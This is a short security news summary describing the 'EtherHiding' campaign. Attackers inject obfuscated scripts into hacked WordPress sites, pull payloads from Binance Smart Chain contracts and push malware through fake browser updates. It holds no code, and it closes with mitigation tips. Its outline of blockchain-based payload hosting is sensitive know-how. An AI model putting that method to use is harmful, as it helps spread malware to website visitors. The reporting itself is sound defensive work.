Threat actors have developed a technique known as ‘EtherHiding’ to distribute malicious scripts through Binance’s Smart Chain contracts. This method allows them to exploit the decentralized and anonymous nature of the blockchain, making it challenging to track and disrupt their activities.


Previously, these threat actors targeted vulnerable WordPress sites, injecting hidden JavaScript code to gain remote control over the site and distribute malware through fake browser update warnings [4]. However, they have now shifted their focus to abusing blockchain systems as a more resilient distribution channel.

The attackers inject obfuscated JavaScript into compromised websites, which then queries the Binance Smart Chain to retrieve a payload from a command-and-control server [2]. This payload prompts victims to download a malicious executable. Additionally, they have been observed using a JavaScript framework deployed on compromised websites to deliver malware through drive-by downloads [2].

This attack chain has been linked to the deployment of malware loaders such as IDAT Loader and HijackLoader [2], which serve as launchpads for various stealers and trojans [2]. There are also tactical overlaps between the EtherHiding technique and another malware family called SocGholish, suggesting the possibility of one threat group being responsible for both.

Binance’s Smart Chain [1] [2] [3] [4] [5], a blockchain platform that competes with Ethereum [3], is described by the attackers as a “next level of bulletproof hosting.” They target vulnerable WordPress sites or compromised admin credentials to inject script tags into webpages, loading the Binance Smart Chain JavaScript library and fetching malicious scripts from the blockchain [5]. These scripts then trigger the download of a third-stage payload [5], which prompts users to update their browsers and leads to the download of a malicious executable [5].

The decentralized nature of the blockchain makes these attacks unblockable, and the attackers can easily change the command-and-control server address to evade blocks [5]. Once a smart contract is deployed on the Binance Smart Chain, it operates autonomously and cannot be shut down [5].


To mitigate the problem [5], it is recommended to keep WordPress infrastructure and plugins updated [4], safeguard credentials [4], and monitor website activity [4]. The impact of these attacks is significant, as they exploit the decentralized and anonymous nature of the blockchain to distribute malware. Future implications include the need for increased security measures and vigilance to protect against similar attacks in the future.